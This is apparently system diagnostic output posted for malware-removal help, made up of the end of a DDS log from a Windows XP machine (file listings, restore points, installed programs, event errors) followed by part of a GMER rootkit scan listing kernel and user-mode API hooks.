2014-04-19 05:30:03 145408 ----a-w- c:\windows\system32\javacpl.cpl
2014-04-19 05:29:50 94632 ----a-w- c:\windows\system32\WindowsAccessBridge.dll
.
==================== Find3M ====================
.
2014-04-29 02:27:37 70832 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-04-29 02:27:37 692400 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-03-06 17:59:23 920064 ----a-w- c:\windows\system32\wininet.dll
2014-03-06 17:59:22 43520 ----a-w- c:\windows\system32\licmgr10.dll
2014-03-06 17:59:22 18944 ----a-w- c:\windows\system32\corpol.dll
2014-03-06 17:59:22 1469440 ----a-w- c:\windows\system32\inetcpl.cpl
2014-03-06 00:46:54 385024 ----a-w- c:\windows\system32\html.iec
2014-03-04 04:18:12 936152 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symefa.sys
2014-02-26 01:59:05 13312 ------w- c:\windows\system32\xp_eos.exe
2014-02-18 01:32:41 447704 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symnets.sys
2014-02-18 01:32:41 423256 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symtdi.sys
2014-02-18 01:32:41 384728 ----a-w- c:\windows\system32\drivers\n360\1502000.026\symtdiv.sys
2014-02-13 01:59:49 664280 ----a-w- c:\windows\system32\drivers\n360\1502000.026\srtsp.sys
2011-03-30 16:40:34 517976 ----a-w- c:\program files\DXSETUP.exe
2011-03-30 16:40:32 95576 ----a-w- c:\program files\DSETUP.dll
2011-03-30 16:40:32 1566040 ----a-w- c:\program files\dsetup32.dll
.
============= FINISH: 18:22:26.09 ===============


.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows XP Home Edition
Boot Device: \Device\HarddiskVolume1
Install Date: 2/27/2013 4:48:21 PM
System Uptime: 5/9/2014 5:41:33 PM (1 hours ago)
.
Motherboard: Dell Computer Corp. | | 02X378
Processor: Intel(R) Pentium(R) 4 CPU 2.00GHz | Microprocessor | 1992/400mhz
.
==== Disk Partitions =========================
.
A: is Removable
C: is FIXED (NTFS) - 298 GiB total, 231.427 GiB free.
D: is CDROM ()
E: is FIXED (NTFS) - 37 GiB total, 34.76 GiB free.
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP370: 2/8/2014 9:58:58 AM - System Checkpoint
RP371: 2/9/2014 10:59:51 AM - System Checkpoint
RP372: 2/9/2014 5:13:34 PM - Ace Utilities : Before Registry Cleanup
RP373: 2/10/2014 7:16:16 PM - System Checkpoint
RP374: 2/11/2014 6:45:03 PM - Software Distribution Service 3.0
RP375: 2/12/2014 12:22:46 AM - Ace Utilities : Before Registry Cleanup
RP376: 2/13/2014 11:23:34 AM - System Checkpoint
RP377: 2/14/2014 4:24:49 PM - System Checkpoint
RP378: 2/15/2014 1:46:06 PM - Removed Ask Toolbar
RP379: 2/15/2014 5:42:33 PM - Ace Utilities : Before Registry Cleanup
RP380: 2/16/2014 11:35:31 PM - System Checkpoint
RP381: 2/17/2014 3:07:04 PM - Ace Utilities : Before Registry Cleanup
RP382: 2/18/2014 6:22:23 PM - System Checkpoint
RP383: 2/19/2014 11:56:39 PM - System Checkpoint
RP384: 2/21/2014 12:04:46 AM - System Checkpoint
RP385: 2/22/2014 10:30:58 AM - Ace Utilities : Before Registry Cleanup
RP386: 2/23/2014 9:36:33 PM - System Checkpoint
RP387: 2/23/2014 11:41:32 PM - Ace Utilities : Before Registry Cleanup
RP388: 2/25/2014 11:09:32 AM - System Checkpoint
RP389: 2/26/2014 6:10:14 PM - System Checkpoint
RP390: 2/27/2014 9:22:21 PM - System Checkpoint
RP391: 2/28/2014 10:22:45 PM - System Checkpoint
RP392: 3/1/2014 3:31:03 PM - Ace Utilities : Before Registry Cleanup
RP393: 3/1/2014 4:06:42 PM - Removed SavetheChildren Reminder by We-Care.com v4.1.26.4
RP394: 3/2/2014 11:30:13 PM - Ace Utilities : Before Registry Cleanup
RP395: 3/4/2014 1:10:35 AM - System Checkpoint
RP396: 3/5/2014 2:14:11 AM - System Checkpoint
RP397: 3/6/2014 4:01:04 AM - System Checkpoint
RP398: 3/6/2014 9:39:07 AM - Software Distribution Service 3.0
RP399: 3/7/2014 1:14:14 PM - System Checkpoint
RP400: 3/8/2014 7:16:19 PM - Ace Utilities : Before Registry Cleanup
RP401: 3/9/2014 11:36:26 PM - System Checkpoint
RP402: 3/10/2014 3:06:59 AM - Ace Utilities : Before Registry Cleanup
RP403: 3/11/2014 6:06:38 AM - System Checkpoint
RP404: 3/12/2014 3:00:18 AM - Software Distribution Service 3.0
RP405: 3/12/2014 11:27:55 PM - Ace Utilities : Before Registry Cleanup
RP406: 3/14/2014 1:01:43 AM - System Checkpoint
RP407: 3/15/2014 1:27:37 AM - System Checkpoint
RP408: 3/16/2014 4:06:27 AM - System Checkpoint
RP409: 3/17/2014 10:14:49 AM - System Checkpoint
RP410: 3/18/2014 10:51:16 AM - System Checkpoint
RP411: 3/18/2014 8:28:20 PM - Software Distribution Service 3.0
RP412: 3/19/2014 10:55:32 PM - System Checkpoint
RP413: 3/21/2014 10:25:08 AM - System Checkpoint
RP414: 3/22/2014 10:53:59 AM - System Checkpoint
RP415: 3/23/2014 6:15:38 PM - System Checkpoint
RP416: 3/24/2014 7:58:08 PM - System Checkpoint
RP417: 3/25/2014 10:33:32 PM - System Checkpoint
RP418: 3/27/2014 11:31:21 AM - System Checkpoint
RP419: 3/27/2014 8:22:28 PM - Ace Utilities : Before Registry Cleanup
RP420: 3/28/2014 11:40:41 PM - System Checkpoint
RP421: 3/30/2014 12:14:17 AM - System Checkpoint
RP422: 3/31/2014 12:33:07 AM - System Checkpoint
RP423: 4/1/2014 12:57:36 AM - System Checkpoint
RP424: 4/2/2014 11:32:13 AM - System Checkpoint
RP425: 4/3/2014 2:23:09 PM - System Checkpoint
RP426: 4/4/2014 1:04:21 AM - Ace Utilities : Before Registry Cleanup
RP427: 4/5/2014 1:54:36 AM - System Checkpoint
RP428: 4/6/2014 7:08:17 AM - System Checkpoint
RP429: 4/6/2014 10:29:39 PM - Ace Utilities : Before Registry Cleanup
RP430: 4/7/2014 11:25:42 PM - System Checkpoint
RP431: 4/8/2014 4:44:30 PM - Software Distribution Service 3.0
RP432: 4/9/2014 6:45:21 PM - System Checkpoint
RP433: 4/9/2014 10:55:35 PM - Ace Utilities : Before Registry Cleanup
RP434: 4/10/2014 11:51:03 PM - System Checkpoint
RP435: 4/12/2014 2:20:48 AM - System Checkpoint
RP436: 4/13/2014 3:16:27 AM - System Checkpoint
RP437: 4/13/2014 8:47:13 AM - Ace Utilities : Before Registry Cleanup
RP438: 4/14/2014 11:29:48 AM - System Checkpoint
RP439: 4/15/2014 6:39:45 PM - System Checkpoint
RP440: 4/16/2014 4:52:18 AM - Ace Utilities : Before Registry Cleanup
RP441: 4/17/2014 11:21:09 AM - System Checkpoint
RP442: 4/18/2014 2:07:42 PM - System Checkpoint
RP443: 4/19/2014 12:28:43 AM - Installed Java 7 Update 55
RP444: 4/19/2014 10:33:31 AM - Ace Utilities : Before Registry Cleanup
RP445: 4/20/2014 4:26:30 PM - System Checkpoint
RP446: 4/21/2014 6:08:06 PM - System Checkpoint
RP447: 4/22/2014 7:34:44 PM - System Checkpoint
RP448: 4/23/2014 10:20:39 PM - System Checkpoint
RP449: 4/25/2014 12:36:51 AM - System Checkpoint
RP450: 4/26/2014 1:54:02 AM - System Checkpoint
RP451: 4/26/2014 1:57:58 PM - Ace Utilities : Before Registry Cleanup
RP452: 4/27/2014 5:14:41 PM - System Checkpoint
RP453: 4/28/2014 5:40:52 PM - System Checkpoint
RP454: 4/29/2014 5:18:30 AM - Ace Utilities : Before Registry Cleanup
RP455: 4/30/2014 10:23:29 AM - System Checkpoint
RP456: 5/1/2014 1:34:38 AM - Ace Utilities : Before Registry Cleanup
RP457: 5/2/2014 8:28:55 AM - Software Distribution Service 3.0
RP458: 5/4/2014 10:01:17 AM - System Checkpoint
RP459: 5/5/2014 1:07:26 AM - Ace Utilities : Before Registry Cleanup
RP460: 5/6/2014 5:22:24 AM - System Checkpoint
RP461: 5/7/2014 2:49:13 PM - System Checkpoint
RP462: 5/8/2014 5:58:13 PM - Ace Utilities : Before Registry Cleanup
.
==== Installed Programs ======================
.
Ace Utilities
Adobe Flash Player 13 ActiveX
Adobe Flash Player 13 Plugin
Adobe Reader XI (11.0.06)
AI RoboForm (All Users)
Compatibility Pack for the 2007 Office system
Copernic Agent Personal
Copernic Desktop Search - Home
Easy Hi-Q Recorder 2.5
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Hotfix for Windows Media Format 11 SDK (KB929399)
Hotfix for Windows Media Player 11 (KB939683)
Hotfix for Windows XP (KB2779562)
Hotfix for Windows XP (KB952287)
Hotfix for Windows XP (KB954550-v5)
Hotfix for Windows XP (KB961118)
HP LaserJet P1000 series
HPCarePackProducts
Intel(R) Extreme Graphics Driver
Intel(R) PRO Ethernet Adapter and Software
iolo technologies' System Mechanic
Java 7 Update 55
Java Auto Updater
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1 Security Update (KB2833941)
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5 SP1
Microsoft Compression Client Pack 1.0 for Windows XP
Microsoft Office Standard Edition 2003
Microsoft User-Mode Driver Framework Feature Pack 1.0
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Mozilla Firefox 28.0 (x86 en-US)
Mozilla Maintenance Service
Mp3Gain PRO
Norton Security Suite
Paint XP version 1.1
Paltalk Messenger 11.3
RarmaRadio 2.69
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697)
Security Update for Microsoft Windows (KB2564958)
Security Update for Windows Internet Explorer 8 (KB2510531)
Security Update for Windows Internet Explorer 8 (KB2792100)
Security Update for Windows Internet Explorer 8 (KB2797052)
Security Update for Windows Internet Explorer 8 (KB2809289)
Security Update for Windows Internet Explorer 8 (KB2817183)
Security Update for Windows Internet Explorer 8 (KB2829530)
Security Update for Windows Internet Explorer 8 (KB2838727)
Security Update for Windows Internet Explorer 8 (KB2846071)
Security Update for Windows Internet Explorer 8 (KB2847204)
Security Update for Windows Internet Explorer 8 (KB2862772)
Security Update for Windows Internet Explorer 8 (KB2870699)
Security Update for Windows Internet Explorer 8 (KB2879017)
Security Update for Windows Internet Explorer 8 (KB2888505)
Security Update for Windows Internet Explorer 8 (KB2898785)
Security Update for Windows Internet Explorer 8 (KB2909210)
Security Update for Windows Internet Explorer 8 (KB2909921)
Security Update for Windows Internet Explorer 8 (KB2925418)
Security Update for Windows Internet Explorer 8 (KB2936068)
Security Update for Windows Internet Explorer 8 (KB2964358)
Security Update for Windows Media Player (KB2378111)
Security Update for Windows Media Player (KB2834904-v2)
Security Update for Windows Media Player (KB2834904)
Security Update for Windows Media Player (KB952069)
Security Update for Windows Media Player (KB954155)
Security Update for Windows Media Player (KB973540)
Security Update for Windows Media Player (KB975558)
Security Update for Windows Media Player (KB978695)
Security Update for Windows Media Player 11 (KB954154)
Security Update for Windows XP (KB2115168)
Security Update for Windows XP (KB2229593)
Security Update for Windows XP (KB2296011)
Security Update for Windows XP (KB2347290)
Security Update for Windows XP (KB2360937)
Security Update for Windows XP (KB2387149)
Security Update for Windows XP (KB2393802)
Security Update for Windows XP (KB2419632)
Security Update for Windows XP (KB2423089)
Security Update for Windows XP (KB2440591)
Security Update for Windows XP (KB2443105)
Security Update for Windows XP (KB2478960)
Security Update for Windows XP (KB2478971)
Security Update for Windows XP (KB2479943)
Security Update for Windows XP (KB2481109)
Security Update for Windows XP (KB2483185)
Security Update for Windows XP (KB2485663)
Security Update for Windows XP (KB2491683)
Security Update for Windows XP (KB2506212)
Security Update for Windows XP (KB2507938)
Security Update for Windows XP (KB2508429)
Security Update for Windows XP (KB2509553)
Security Update for Windows XP (KB2535512)
Security Update for Windows XP (KB2536276-v2)
Security Update for Windows XP (KB2544893-v2)
Security Update for Windows XP (KB2566454)
Security Update for Windows XP (KB2570947)
Security Update for Windows XP (KB2584146)
Security Update for Windows XP (KB2585542)
Security Update for Windows XP (KB2592799)
Security Update for Windows XP (KB2598479)
Security Update for Windows XP (KB2603381)
Security Update for Windows XP (KB2618451)
Security Update for Windows XP (KB2619339)
Security Update for Windows XP (KB2620712)
Security Update for Windows XP (KB2624667)
Security Update for Windows XP (KB2631813)
Security Update for Windows XP (KB2646524)
Security Update for Windows XP (KB2653956)
Security Update for Windows XP (KB2655992)
Security Update for Windows XP (KB2659262)
Security Update for Windows XP (KB2661637)
Security Update for Windows XP (KB2676562)
Security Update for Windows XP (KB2686509)
Security Update for Windows XP (KB2691442)
Security Update for Windows XP (KB2698365)
Security Update for Windows XP (KB2705219-v2)
Security Update for Windows XP (KB2712808)
Security Update for Windows XP (KB2719985)
Security Update for Windows XP (KB2723135-v2)
Security Update for Windows XP (KB2727528)
Security Update for Windows XP (KB2753842-v2)
Security Update for Windows XP (KB2757638)
Security Update for Windows XP (KB2758857)
Security Update for Windows XP (KB2770660)
Security Update for Windows XP (KB2778344)
Security Update for Windows XP (KB2780091)
Security Update for Windows XP (KB2799494)
Security Update for Windows XP (KB2802968)
Security Update for Windows XP (KB2807986)
Security Update for Windows XP (KB2808735)
Security Update for Windows XP (KB2813170)
Security Update for Windows XP (KB2813345)
Security Update for Windows XP (KB2820197)
Security Update for Windows XP (KB2820917)
Security Update for Windows XP (KB2829361)
Security Update for Windows XP (KB2834886)
Security Update for Windows XP (KB2839229)
Security Update for Windows XP (KB2845187)
Security Update for Windows XP (KB2847311)
Security Update for Windows XP (KB2849470)
Security Update for Windows XP (KB2850851)
Security Update for Windows XP (KB2850869)
Security Update for Windows XP (KB2859537)
Security Update for Windows XP (KB2862152)
Security Update for Windows XP (KB2862330)
Security Update for Windows XP (KB2862335)
Security Update for Windows XP (KB2864063)
Security Update for Windows XP (KB2868038)
Security Update for Windows XP (KB2868626)
Security Update for Windows XP (KB2876217)
Security Update for Windows XP (KB2876315)
Security Update for Windows XP (KB2876331)
Security Update for Windows XP (KB2883150)
Security Update for Windows XP (KB2892075)
Security Update for Windows XP (KB2893294)
Security Update for Windows XP (KB2893984)
Security Update for Windows XP (KB2898715)
Security Update for Windows XP (KB2900986)
Security Update for Windows XP (KB2914368)
Security Update for Windows XP (KB2916036)
Security Update for Windows XP (KB2922229)
Security Update for Windows XP (KB2929961)
Security Update for Windows XP (KB2930275)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB941569)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB956802)
Security Update for Windows XP (KB956844)
Security Update for Windows XP (KB959426)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB969059)
Security Update for Windows XP (KB970430)
Security Update for Windows XP (KB971657)
Security Update for Windows XP (KB972270)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB973904)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB975467)
Security Update for Windows XP (KB975560)
Security Update for Windows XP (KB975713)
Security Update for Windows XP (KB977816)
Security Update for Windows XP (KB977914)
Security Update for Windows XP (KB978338)
Security Update for Windows XP (KB978542)
Security Update for Windows XP (KB978706)
Security Update for Windows XP (KB979309)
Security Update for Windows XP (KB979482)
Security Update for Windows XP (KB979687)
Security Update for Windows XP (KB981322)
Security Update for Windows XP (KB981997)
Security Update for Windows XP (KB982132)
Security Update for Windows XP (KB982665)
Smart WAV Converter Pro
SoundMAX
Spybot - Search & Destroy
TinEye Internet Explorer plugin 1.2
TK8 Backup 4.5
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Windows XP (KB2345886)
Update for Windows XP (KB2661254-v2)
Update for Windows XP (KB2736233)
Update for Windows XP (KB2749655)
Update for Windows XP (KB2863058)
Update for Windows XP (KB2904266)
Update for Windows XP (KB2934207)
Update for Windows XP (KB898461)
Update for Windows XP (KB951978)
Update for Windows XP (KB955759)
Update for Windows XP (KB968389)
Update for Windows XP (KB971029)
Update for Windows XP (KB973815)
WebFldrs XP
Windows Genuine Advantage Validation Tool (KB892130)
Windows Internet Explorer 8
Windows Media Format 11 runtime
Windows Media Player 11
Windows PowerShell(TM) 1.0
Windows XP Service Pack 3
.
==== Event Viewer Messages From Past Week ========
.
5/9/2014 3:52:53 PM, error: atapi [9] - The device, \Device\Ide\IdePort1, did not respond within the timeout period.
5/8/2014 5:44:17 PM, error: W32Time [17] - Time Provider NtpClient: An error occurred during DNS lookup of the manually configured peer 'time-a.nist.gov,0x1'. NtpClient will try the DNS lookup again in 15 minutes. The error was: A socket operation was attempted to an unreachable host. (0x80072751)
.
==== End Of File ===========================



GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-05-09 20:07:04
Windows 5.1.2600 Service Pack 3 \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-4 WDC_WD3200AAJB-00J3A0 rev.01.03E01 298.09GB
Running: 4t7f1vyw.exe; Driver: C:\DOCUME~1\Owner\LOCALS~1\Temp\pxtdypow.sys


---- System - GMER 2.1 ----

SSDT 8968D8E0 ZwAlertResumeThread
SSDT 8968D978 ZwAlertThread
SSDT 89647840 ZwAllocateVirtualMemory
SSDT 896A5B88 ZwAssignProcessToJobObject
SSDT 89786710 ZwConnectPort
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwCreateKey [0xB1C7BF50]
SSDT 8968D708 ZwCreateMutant
SSDT 896A5A38 ZwCreateSymbolicLinkObject
SSDT 895A18F0 ZwCreateThread
SSDT 896A5C20 ZwDebugActiveProcess
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwDeleteKey [0xB1C7C1D0]
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwDeleteValueKey [0xB1C7C890]
SSDT 895D36B0 ZwDuplicateObject
SSDT 896476F0 ZwFreeVirtualMemory
SSDT 8968D7B0 ZwImpersonateAnonymousToken
SSDT 8968D848 ZwImpersonateThread
SSDT 898013A8 ZwLoadDriver
SSDT 8968DD90 ZwMapViewOfSection
SSDT 8968D6B0 ZwOpenEvent
SSDT 89596738 ZwOpenProcess
SSDT 895A2740 ZwOpenProcessToken
SSDT 896A5D70 ZwOpenSection
SSDT 895D3738 ZwOpenThread
SSDT 896A5AE0 ZwProtectVirtualMemory
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwRenameKey [0xB1C7CDF0]
SSDT 8968DA10 ZwResumeThread
SSDT 8968DBD8 ZwSetContextThread
SSDT 8968DC70 ZwSetInformationProcess
SSDT 896A5CB8 ZwSetSystemInformation
SSDT \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS ZwSetValueKey [0xB1C7CB10]
SSDT 896A5E08 ZwSuspendProcess
SSDT 8968DAA8 ZwSuspendThread
SSDT 89873408 ZwTerminateProcess
SSDT 8968DB40 ZwTerminateThread
SSDT 8968DD18 ZwUnmapViewOfSection
SSDT 89647798 ZwWriteVirtualMemory

---- Kernel code sections - GMER 2.1 ----

? SYMDS.SYS The system cannot find the file specified. !
? SYMEFA.SYS The system cannot find the file specified. !
? C:\DOCUME~1\Owner\LOCALS~1\Temp\mbr.sys The filename, directory name, or volume label syntax is incorrect. !

---- User code sections - GMER 2.1 ----

.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ntdll.dll!NtMapViewOfSection 7C90D51E 5 Bytes JMP 003B0048
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ntdll.dll!NtTerminateThread 7C90DE7E 5 Bytes JMP 00380050
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!OpenSCManagerW + A3 77DE6FF8 7 Bytes JMP 003B020E
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!LogonUserExW + 461 77DF4A04 7 Bytes JMP 003B012A
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!SystemFunction025 + 8D 77DF4C61 7 Bytes JMP 003B0682
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!SetServiceObjectSecurity + E3 77E36E64 7 Bytes JMP 003B059E
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!ChangeServiceConfigA + 193 77E36FFC 7 Bytes JMP 003B03D6
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!ChangeServiceConfig2W + 83 77E3720C 2 Bytes JMP 003B02F2
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!ChangeServiceConfig2W + 86 77E3720F 4 Bytes [57, 88, EB, F9] {PUSH EDI; MOV BL, CH; STC }
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!CreateServiceA + 193 77E373A4 7 Bytes JMP 003B04BA
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] ADVAPI32.dll!CreateServiceW + 103 77E374AC 7 Bytes JMP 003B0766
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] USER32.dll!CreateSystemThreads + 10A 7E4317F2 7 Bytes JMP 003B092C
.text C:\Documents and Settings\Owner\Desktop\4t7f1vyw.exe[1044] USER32.dll!DeviceEventWorker + 178 7E45A270 7 Bytes JMP 003B084A
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxParamW 7E4247AB 5 Bytes JMP 3E215545 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!CreateWindowExW 7E42D0A3 5 Bytes JMP 3E2EDC24 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxIndirectParamW 7E432072 5 Bytes JMP 3E3E7997 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxIndirectA 7E43A082 5 Bytes JMP 3E3E78C9 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxParamA 7E43B144 5 Bytes JMP 3E3E7934 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxExW 7E450838 5 Bytes JMP 3E3E779A C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxExA 7E45085C 5 Bytes JMP 3E3E77FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!DialogBoxIndirectParamA 7E456D7D 5 Bytes JMP 3E3E79FA C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2276] USER32.dll!MessageBoxIndirectW 7E4664D5 5 Bytes JMP 3E3E785E C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ntdll.dll!NtMapViewOfSection 7C90D51E 5 Bytes JMP 03A40048
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ntdll.dll!NtSetInformationProcess 7C90DC9E 5 Bytes JMP 03A4012A
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!VirtualProtectEx + 6E 7C801ACF 7 Bytes JMP 03A40676
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!ReadProcessMemory + 3E 7C80220E 7 Bytes JMP 03A403D0
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!lstrlenW + 43 7C809AEC 7 Bytes JMP 03A40594
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!CreateRemoteThread + 206 7C810702 7 Bytes JMP 03A402EE
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!GetVersionExA + D3 7C810903 7 Bytes JMP 03A40758
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] kernel32.dll!GetProcessHandleCount + 35 7C862F2F 7 Bytes JMP 03A404B2
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxParamW 7E4247AB 5 Bytes JMP 3E215545 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!SetWindowsHookExW 7E42820F 5 Bytes JMP 3E2E9B99 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!CallNextHookEx 7E42B3C6 5 Bytes JMP 3E2DD1CD C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!CreateWindowExW 7E42D0A3 5 Bytes JMP 3E2EDC24 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!UnhookWindowsHookEx 7E42D5F3 5 Bytes JMP 3E2546FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxIndirectParamW 7E432072 5 Bytes JMP 3E3E7997 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxIndirectA 7E43A082 5 Bytes JMP 3E3E78C9 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxParamA 7E43B144 5 Bytes JMP 3E3E7934 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxExW 7E450838 5 Bytes JMP 3E3E779A C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxExA 7E45085C 5 Bytes JMP 3E3E77FC C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!DialogBoxIndirectParamA 7E456D7D 5 Bytes JMP 3E3E79FA C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] USER32.dll!MessageBoxIndirectW 7E4664D5 5 Bytes JMP 3E3E785E C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!CreateBindCtx + B5F 774FF177 7 Bytes JMP 03A4091C
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!CoCreateInstance 774FF1D4 5 Bytes JMP 3E2EDC80 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!CoImpersonateClient + 51 77515228 7 Bytes JMP 03A4083A
.text C:\Program Files\Internet Explorer\iexplore.exe[2384] ole32.dll!OleLoadFromStream 7752988B 5 Bytes JMP 3E3E7CFF C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ntdll.dll!NtMapViewOfSection 7C90D51E 5 Bytes JMP 03A40048
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] ntdll.dll!NtSetInformationProcess 7C90DC9E 5 Bytes JMP 03A4012A
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!VirtualProtectEx + 6E 7C801ACF 7 Bytes JMP 03A40676
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!ReadProcessMemory + 3E 7C80220E 7 Bytes JMP 03A403D0
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!lstrlenW + 43 7C809AEC 7 Bytes JMP 03A40594
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!CreateRemoteThread + 206 7C810702 7 Bytes JMP 03A402EE
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!GetVersionExA + D3 7C810903 7 Bytes JMP 03A40758
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] kernel32.dll!GetProcessHandleCount + 35 7C862F2F 7 Bytes JMP 03A404B2
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!DialogBoxParamW 7E4247AB 5 Bytes JMP 3E215545 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!SetWindowsHookExW 7E42820F 5 Bytes JMP 3E2E9B99 C:\WINDOWS\system32\IEFRAME.dll
.text C:\Program Files\Internet Explorer\iexplore.exe[3864] USER32.dll!CallNextHookEx 7E42B3C6 5 Bytes JMP 3E2DD1CD C:\WINDOWS\system32\IEFRAME.dll
